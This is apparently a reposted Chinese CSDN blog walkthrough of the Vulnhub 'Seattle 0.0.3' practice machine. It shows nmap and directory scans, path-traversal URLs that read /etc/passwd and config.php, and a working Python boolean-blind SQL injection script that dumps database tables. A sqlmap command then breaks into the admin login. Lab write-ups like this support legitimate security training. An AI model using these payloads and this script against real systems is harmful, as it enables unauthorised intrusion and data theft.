【Vulnhub系列】Vulnhub_Seattle_003靶场渗透(原创)

最新推荐文章于 2024-11-09 14:59:10 发布
最新推荐文章于 2024-11-09 14:59:10 发布
阅读量1.4k 收藏 14
点赞数 9
分类专栏: Vulnhub系列 文章标签: web安全 安全 网络安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70142722/article/details/140768395
版权

【Vulnhub系列靶场】Vulnhub_Seattle_003靶场渗透

原文转载已经过授权
原文链接:Lusen的小窝 - 学无止尽,不进则退 (lusensec.github.io)

一、环境准备

1、从百度网盘下载对应靶机的.ova镜像

2、在VM中选择【打开】该.ova

image-20240210134843692

3、选择存储路径,并打开

image-20240210134856511

4、之后确认网络连接模式是否为【NAT】

二、信息收集

1、主机发现

nmap.exe -sn 192.168.31.*

image-20240210103254625

2、端口探测

1、快速粗略的扫描

nmap.exe -F 192.168.31.59

image-20240210103434464

2、全端口精细扫描

nmap.exe -sT --min-rate 10000 -p- 192.168.31.59
nmap.exe -sU --min-rate 10000 -p- 192.168.31.59

image-20240210104357998

image-20240210103651560

确认只开放了80端口

3、全扫描和漏洞扫描

nmap.exe -sT -sV -sC -O -p80 192.168.31.59
nmap.exe -sT -sV -sC -O -p80 192.168.31.59

image-20240210104536620

确认是Linux的Fedora 系统,是由 Red Hat 公司赞助和领导

image-20240210104717424

漏洞脚本探测出来存在csrf 和sql注入漏洞,很显然,这个SQL注入漏洞是一个关键点

3、web目录探测

dirsearch.cmd -u http://192.168.31.59 -x 404,403

image-20240210104043275

针对zip等敏感文件进行扫描

dirb http://192.168.31.59 -X .php,.zip,.txt,.tar,.rar

image-20240210105150253

4、web框架探测

whatweb http://192.168.31.59

image-20240210105210851

三、获取shell立足点

1、查看敏感文件

1、在downloads目录下发现.pdf文件

image-20240210105554332

image-20240210105619577

是一个对网站此时状态的一个描述,表示现在的网站有很多漏洞,诸如SQL漏洞、XSS、用户名泄露以及任意文件下载漏洞

image-20240210105728931

image-20240210105742640

image-20240210105806973

image-20240210105954501

2、任意文件下载漏洞

通过任意文件下载漏洞尝试下载/etc/passwwd 文件

http://192.168.31.59/download.php?item=../../../../../../etc/passwd

image-20240210110317205

只存在root用户

下载config.php文件

http://192.168.31.59/download.php?item=../config.php

image-20240210114250835

拿到数据库的账号密码:root:Alexis*94

3、SQL注入漏洞

我们对http://192.168.31.59/details.php?type=2&prod=5路径进行爆破,可以看到是一个布尔类型的SQL注入,我们修进我们的SQL_Boole 脚本

import requests

# 存在GET类型的SQL注入的URL链接和参数
url = 'http://192.168.31.59/details.php?type=2&prod=5'

def column_data_name(column_data_len,User_table_name,User_column_name):
    column_data_names = {}
    column_one_name = ''
    for i in range(0,len(column_data_len)):         #i是第几个字段的值
        for j in range(1,column_data_len[i]+1):     #j是要爆破字段值的第几个字符
            for n in range(0,126):                  #n是要爆破字段值的ascii码值
                new_url = url + "%20and%20ascii(substr((select " + User_column_name + " from " + User_table_name + " limit "+ str(i) +",1)," + str(j) + ",1))=" + str(n)
                if Response_judgment(new_url):
                    column_one_name += chr(n)
                    break
        print(f"{User_column_name}字段的第{i}个值为:{column_one_name}")
        column_data_names[i] = column_one_name
        column_one_name = ''
    return column_data_names

def column_data_length(column_names,User_table_name,User_column_name):
    column_data_len = {}
    for i in range(0,10):           #i是第几个字段的值,猜测10个数值
        for j in range(1,20):       #j是要爆破字段数值的长度,猜测该字段数值最大为20
            new_url = url + "%20and%20length((select "+ User_column_name +" from "+ User_table_name +" limit "+ str(i) +",1))=" + str(j)
            if Response_judgment(new_url):
                column_data_len[i] = j
                if i == 10:
                    print('已超过测试数值的最大值,请调整!!!')
                break
    return column_data_len

def column_name(column_len,User_table_name):
    column_names = {}
    column_one_name = ''
    for i in range(0,len(column_len)):          #i是第几个字段,len(column_len) 是字段的数量
        for j in range(1,column_len[i]+1):      #j是要爆破字段的第几个字符
            for n in range(0,126):              #n是要爆破字段名的ascii码值
                new_url = url + "%20and%20ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name=" + hex(int.from_bytes(User_table_name.encode(),'big')) + " limit "+ str(i) +",1)," + str(j) + ",1))=" + str(n)
                if Response_judgment(new_url):
                    column_one_name += chr(n)
                    break
        print(f"{User_table_name}表的第{i}个字段的名称为:{column_one_name}")
        column_names[i] = column_one_name
        column_one_name = ''
    return column_names

def column_length(User_table_name):     #要查看的表名
    column_len = {}
    for i in range(0,10):               #i是第几个字段,这里假设有10个字段
        for j in range(1,30):           #j是要爆破字段的长度,假设字段长度最长为20
            new_url = url + "%20and%20length((select column_name from information_schema.columns where table_schema=database() and table_name="+ hex(int.from_bytes(User_table_name.encode(), 'big')) +" limit "+ str(i) +",1))=" + str(j)
            if Response_judgment(new_url):
                column_len[i] = j
                if i == 10:
                    print('已超过测试字段数的最大值,请调整!!!')
                break
    return column_len

def table_name(table_len):
    table_names = {}
    table_one_name = ''
    for i in range(0,len(table_len)):       #i是第几张表,len(table_len)表示共有几张表
        for j in range(1,table_len[i]+1):   #j是要爆破表名第几个字符,到表的长度
            for n in range(0,126):          #n是要爆破表名的ascii码值
                new_url = url + "%20and%20ascii(substr((select table_name from information_schema.tables where table_schema=database() limit " + str(i) + ",1)," + str(j) + ",1))=" + str(n)
                if Response_judgment(new_url):
                    table_one_name += chr(n)
                    break
        print(f"第{i}张表的名称为:{table_one_name}")
        table_names[i] = table_one_name
        table_one_name = ''
    return table_names

def table_length():
    table_len = {}
    for i in range(0,10):           #i是第几张表
        for j in range(1,10):       #j是要爆破表的长度
            new_url = url + "%20and%20length((select table_name from information_schema.tables where table_schema=database() limit " + str(i) + ",1))=" + str(j)
            if Response_judgment(new_url):
                table_len[i] = j
                break
    return table_len

def database_name(database_len):
    database_names = ''
    for i in range(1,database_len + 1):     #i是数据库的第几个字符
        for j in range(0,126):              #j是要爆破数据库名的ascii码值
            new_url = url + "%20and%20ascii(substr(database()," + str(i) + ",1))=" + str(j)
            if Response_judgment(new_url):
                database_names += chr(j)
                break
    return database_names

def database_length():
    new_url = ''
    for i in range(1,10):       #假设数据库的长度在10以内
        new_url = url + "%20and%20length(database())=" + str(i)
        if Response_judgment(new_url):
            return i
    print('payload无效,请更替payload或增加爆破的数据库名长度!!!')
    print(new_url)

def Response_judgment(new_url):
    cookies = {
        'level' : '1'
    }
    respone = requests.get(new_url, cookies=cookies)
    if "T-Shirt" in respone.text:
        return True
    else:
        return False

def main():
    print('-----------------------------')
    database_names = database_name(database_length())   #这里传入数据库的长度
    print(f"当前数据库的名称为:{database_names}")
    print('-----------------------------')
    table_names = table_name(table_length())            #求表的名称,传入表的长度
    while True:                 #这里做无限循环,以方便循环查询所有的表
        print('-----------------------------')
        print(f"所有表的名称为:{table_names}")
        User_table_name = input('请输入要查看的表名(exit退出):')
        if User_table_name == 'exit':
            break
        print('-----------------------------')
        column_names = column_name(column_length(User_table_name),User_table_name)       #求字段的名字,输入字段的长度
        while True:             #这里做无限循环,方便查询表的所有字段值
            print('-----------------------------')
            print(f"该表中所有字段的名称为:{column_names}")
            User_column_name = input('请输入要查看的字段名(exit退出):')
            if User_column_name == 'exit':
                break
            print('-----------------------------')
            column_data_len = column_data_length(column_names,User_table_name,User_column_name)   #求字段值的长度,传入字段的名称
            column_data_names = column_data_name(column_data_len,User_table_name,User_column_name)  #求字段的值
            print('-----------------------------')
            print(f"{User_column_name}字段中所有数值为:{column_data_names}")

if __name__ == '__main__':
    main()
    print('-----------------------------')
    print("Bye!程序已退出!!!")

在判断函数中加入cookie以及修改判断条件即可

image-20240210123233979

image-20240210123406099

这里并没有我们想要的数据,也许是脚本有些地方考虑不周到,但是对脚本的应用是一次不错的提升

4、登录后台

通过任意文件下载漏洞,下载login.php文件进行分析

image-20240210123540577

先判断了用户的邮箱,再判断密码是否正确

正好在blog.php?author=1的页面中爆破了用户邮箱的敏感信息,那么根据源代码分析此处可以造成SQL漏洞

image-20240210123636194

我们拿到用户邮箱,回到登录页面,这里我们直接用sqlmap 进行爆破

sqlmap.cmd -u http://192.168.31.59/login.php --data "usermail=admin@seattlesounds.net&password=111*" --cookie "level=1" --batch -D seattle --tables

在爆破过程中发现该数据库有三张表

image-20240210125137460

而SQL_Boole 脚本未爆破出来其他两张表的原因是,我们假设表的最大长度为10

image-20240210125347335

当我们修改成20之后,SQL_Boole 脚本可以正常使用,且爆破速度比SQLMap 还要快上很多

image-20240210125903261

这里username 无数据,可能也是长度限制的问题,但是好在密码的长度较短,可以爆破出来

image-20240210130050742

也可以爆破出来其他字段,不过在改靶机中我们只拿到密码即可

image-20240210130209765

后台登录成功

5、获取shell立足点

在后台可以提交博客内容,但是无getshell 的方法,此靶机只有web漏洞,不能getshell

原文转载已经过授权
更多文章请访问原文链接:Lusen的小窝 - 学无止尽,不进则退 (lusensec.github.io)

京落尘
关注
专栏目录
Vulnhub-DC-3靶场渗透练习
weixin_52451257的博客
11-17 2997
Vulnhub-DC-3 1105 DC-3 靶场地址: https://www.vulnhub.com/entry/dc-32,312/ 第一步:信息收集 nmap -sn 192.168.231.0/24 nmap -A -p- 192.168.231.141 dirb http://192.168.231.141 nikto -h http://192.168.231.141 去了日常四件套进行信息收集还可以通过joomscan工具对网站进行扫描 joomsc...
Seattle-Loop-Data
05-28
西雅图感应环路检测器数据集V.1(2015) 全网流量预测数据集 数据由部署在西雅图地区高速公路上的感应式环路检测器收集。 高速公路包含I-5,I-405,I-90和SR-520,如上图所示。 该数据集包含高速公路系统的时空速度信息。 在图片中,每个蓝色图标在一个里程碑处都展示了环路检测器。 里程点的速度信息是从主航线上多个环路探测器沿特定里程点的相同方向求平均的。 数据集的时间间隔为5分钟。 数据下载链接包含文件列表: speed_matrix_2015 :循环速度矩阵,这是一个腌制的文件,可以由熊猫或其他python包读取。 Loop_Seattle_2015_A.npy :循环邻接矩阵,它是一个numpy矩阵,用于以图形形式描述交通网络结构。 Loop_Seattle_2015_reachability_free_flow_Xmin.npy :在X minites的驱动器中循
Vulhub-DC-3靶场实战攻略
weixin_51339377的博客
03-16 511
靶场情况特殊 NAT模式无法上线 接下来考虑把靶机放到virtualbox上 但是需要设置virtualbox和vmware共用虚拟网卡才能同网段扫描 之后在kali中就可以选择网卡 测试的时候选择和virtualbox相同的网卡即可 上网的时候选择nat模式的网卡即可 开启virtualbox的靶机 然后攻击机切换网卡到和靶机同一个网段后即可开始进行arp扫描主机的存活 arp-scan -l nmap -T4 -A 192.168.56.1...
vulnhub靶场之DC-3
qq_58091216的博客
01-08 1427
如果您的网站正在运行 Joomla,您可以对您的网站使用 JoomScan 实用程序来发现漏洞或仅提供有助于攻击您网站的一般信息。漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。与以前的 DC 版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有任何线索。Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。我们可以看到用户名爆破出来了,密码是加密的,我们进行解密。
VulnHub靶场】——CFS三层靶机内网渗透实操
热门推荐
Demo不是emo的博客
08-07 1万+
CFS三层靶场实操
Delphi_10_Seattle_入门手册
09-17
**Delphi 10 Seattle 入门指南** Delphi 10 Seattle 是一款强大的集成开发环境(IDE),专为创建高性能的原生Windows、MacOS、iOS和Android应用程序而设计。这款工具以其高效的Object Pascal编程语言为核心,为...
Delphi_10_Seattle_手册_简体中文版.rar
07-06
《Delphi 10 Seattle 手册 简体中文版》是针对 Delphi 开发者的一份详尽参考资料,特别适合那些希望深入理解和提升在 Delphi XE10.3 平台上开发技能的程序员。Delphi 是一款强大的集成开发环境(IDE),以其高效的 ...
workshops_UW_Seattle
04-30
工作坊_UW_西雅图 与华盛顿大学数据科学研讨会相关的文件 本星期 休息至2020年9月 即将到来的话题 GSEA和ViSEAGO 闪亮的应用 网络分析 过去的工作坊 2020.08.11:多重比较校正和FDR 2020.08.04:中介脚本的简要...
【群大礼-02】TRichView v16.14_D10 seattle - 和谐版.rar
07-29
这个【群大礼-02】TRichView v16.14_D10 seattle - 和谐版.rar压缩包包含的是TRichView组件的特定版本,适用于Delphi 10 Seattle开发环境。此版本可能已经过优化或者汉化,被称为“和谐版”,适合中国用户使用。 ...
python_202_seattle-chicago-ds
03-26
基于这些信息,我们可以预期在“python_202_seattle-chicago-ds-master”这个压缩包中找到一系列Jupyter Notebook文件,它们可能会涵盖以下Python和数据科学相关的知识点: 1. **Python基础知识**:包括变量、数据...
Seattle2014-数据集
03-14
Seattle2014.csv
【红日靶场vulnstack3-完整渗透过程
信安是不可或缺的一部分!
10-07 1028
绕过:https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD。现在做内网穿透将这台主机代理出来:我测试我这有问题(我的环境有安全设备拦截了msf的流量)再次横向到30主机:(失败)443gg了,应该是授权的问题,这个win7太久没用了激活掉了。脏牛:https://github.com/Rvn0xsy/linux_dirty。还有其他方式可以横向这个看自己爱好,这次先到这,拿到后可以权限维持,这里不在赘述。
【VulHub靶场】之CFS三层靶机内网渗透
weixin_51519028的博客
10-21 1841
msf配置代理的实操
vulnhub Seattle-0.0.3
m0_62207170的博客
08-28 737
vuluhubSeattle-0.0.3
VulnHub渗透测试实战靶场 - CHILI:1
LYJ20010728的博客
08-20 1260
VulnHub渗透测试实战靶场 - CHILI:1环境下载Tomato:1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 Tomato:1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.138 使用 nmap 扫描开放的端口:sudo nmap -sC -sV -p 1-65
2024年网络安全(黑客技术)三个月自学手册
csbDD的博客
11-06 1687
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
防火墙|WAF|漏洞|网络安全
qq_43777616的博客
11-06 865
防火墙|WAF|漏洞|网络安全
网络安全从零开始学习CTF——CTF基本概念
最新发布
Hacker_Oldv的博客
11-09 833
不要太深入,差不多就可以了,对照文档就可以写出程序就差不多了且能看得懂就好了,因为每个语言都是学不完的,一直在更新,如果过分专注于一个语言,安全知识就挺容易漏下的。上面都是个人想法,怎么选都要靠自己决定,要不要深入、深入哪一门都是问题,一定要考虑清楚再下手,别等下学了一半就改变方向,这是学习的大忌,因为你学其它的也会这样,除非是你发现这个不是很适合你的发展。其中,一血、二血、三血拿的分数比较高,后面答该题的队伍拿的分数就一样了,答题的队伍越少,分数就越多,然后按分数排名,确定进入决赛的队伍。
2024年网络安全进阶手册:黑客技术自学路线
2401_85026965的博客
10-29 1553
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
seattle_hotels.csv 下载
02-07
要下载“seattle_hotels.csv”,你可以按照以下步骤进行操作: 1. 打开你的网络浏览器,确保已连接到互联网。 2. 在浏览器的地址栏中输入“seattle_hotels.csv 下载”并按下回车键。这将通过搜索引擎显示一系列与你搜索相关的结果。 3. 从搜索结果中选择一个可靠的网站,这个网站可以提供你需要下载的CSV文件。 4. 点击选定的网站链接,确保你进入了正确的页面。 5. 查找下载链接,通常这个链接会明确标注为“下载”、“Download”或有一个向下箭头的图标。 6. 点击下载链接,系统会提示你选择保存文件的位置,你可以选择将文件保存在电脑的指定文件夹中。 7. 选择正确的文件夹并点击“保存”按钮,开始下载。 8. 下载完成后,你可以在指定的文件夹中找到刚刚下载的“seattle_hotels.csv”文件。 请注意,在执行以上操作时要确保你正在访问的网站是安全的,并且文件是有效的。为了保护计算机安全,最好使用权威的网站进行文件下载。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值